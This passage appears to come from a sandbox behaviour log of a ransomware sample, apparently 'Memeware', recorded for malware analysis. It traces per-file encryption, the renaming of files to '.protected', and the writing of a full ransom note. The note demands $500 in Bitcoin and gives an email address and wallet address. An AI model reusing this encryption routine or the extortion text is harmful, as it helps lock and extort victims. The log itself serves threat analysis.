[0084.544] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x1a00, lpOverlapped=0x0) returned 1 [0084.549] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.549] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x1a00, lpOverlapped=0x0) returned 1 [0084.549] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.549] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.549] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.550] CloseHandle (hObject=0x14c) returned 1 [0084.550] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.protected") returned 95 [0084.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.protected")) returned 1 [0084.550] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.550] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Windows") returned -1 [0084.551] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Program Files") returned -1 [0084.551] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Program Files (x86)") returned -1 [0084.551] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="$Recycle.bin") returned 1 [0084.551] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="System Volume Information") returned -1 [0084.551] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 80 [0084.551] lstrcmpW (lpString1="Microsoft Feeds~", lpString2=".") returned 1 [0084.551] lstrcmpW (lpString1="Microsoft Feeds~", lpString2="..") returned 1 [0084.551] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*") returned 82 [0084.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.559] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.559] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.559] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.559] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.559] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.559] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\.") returned 82 [0084.559] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.559] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.559] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.559] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.559] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.559] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.559] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.559] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\..") returned 83 [0084.559] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.559] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.559] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Windows") returned -1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Program Files") returned -1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Program Files (x86)") returned -1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="System Volume Information") returned -1 [0084.560] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 107 [0084.560] StrStrIW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".protected") returned 0x0 [0084.560] lstrcmpW (lpString1="Microsoft at Home~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0084.560] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.560] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 107 [0084.560] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".txt") returned 0x0 [0084.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 107 [0084.560] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".rar") returned 0x0 [0084.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 107 [0084.560] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".zip") returned 0x0 [0084.560] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.564] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.564] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.565] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.565] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.565] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.565] CloseHandle (hObject=0x150) returned 1 [0084.565] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.protected") returned 117 [0084.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.protected")) returned 1 [0084.566] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Windows") returned -1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Program Files") returned -1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Program Files (x86)") returned -1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="System Volume Information") returned -1 [0084.566] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 107 [0084.566] StrStrIW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".protected") returned 0x0 [0084.566] lstrcmpW (lpString1="Microsoft at Work~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0084.566] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.566] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 107 [0084.567] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".txt") returned 0x0 [0084.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 107 [0084.567] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".rar") returned 0x0 [0084.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 107 [0084.567] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".zip") returned 0x0 [0084.567] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.572] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.572] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.573] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.573] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.573] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.573] CloseHandle (hObject=0x150) returned 1 [0084.573] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.protected") returned 117 [0084.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.protected")) returned 1 [0084.574] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.574] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Windows") returned -1 [0084.574] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Program Files") returned -1 [0084.574] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Program Files (x86)") returned -1 [0084.574] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.574] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="System Volume Information") returned -1 [0084.574] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 100 [0084.574] StrStrIW (lpFirst="MSNBC News~.feed-ms", lpSrch=".protected") returned 0x0 [0084.574] lstrcmpW (lpString1="MSNBC News~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0084.574] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.574] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 100 [0084.575] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".txt") returned 0x0 [0084.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 100 [0084.575] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".rar") returned 0x0 [0084.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 100 [0084.575] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".zip") returned 0x0 [0084.575] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.580] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.580] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.581] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.581] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.581] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.581] CloseHandle (hObject=0x150) returned 1 [0084.582] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.protected") returned 110 [0084.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.protected")) returned 1 [0084.582] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.582] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.582] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RESTORE_FILES.txt") returned 98 [0084.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.583] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.583] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.583] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.583] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.583] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.583] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.583] CloseHandle (hObject=0x14c) returned 1 [0084.584] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Windows") returned -1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Program Files") returned -1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Program Files (x86)") returned -1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="$Recycle.bin") returned 1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="System Volume Information") returned -1 [0084.584] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 103 [0084.584] lstrcmpW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2=".") returned 1 [0084.584] lstrcmpW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="..") returned 1 [0084.585] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned 105 [0084.585] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.585] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.585] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.585] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.585] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.585] lstrcmpiW 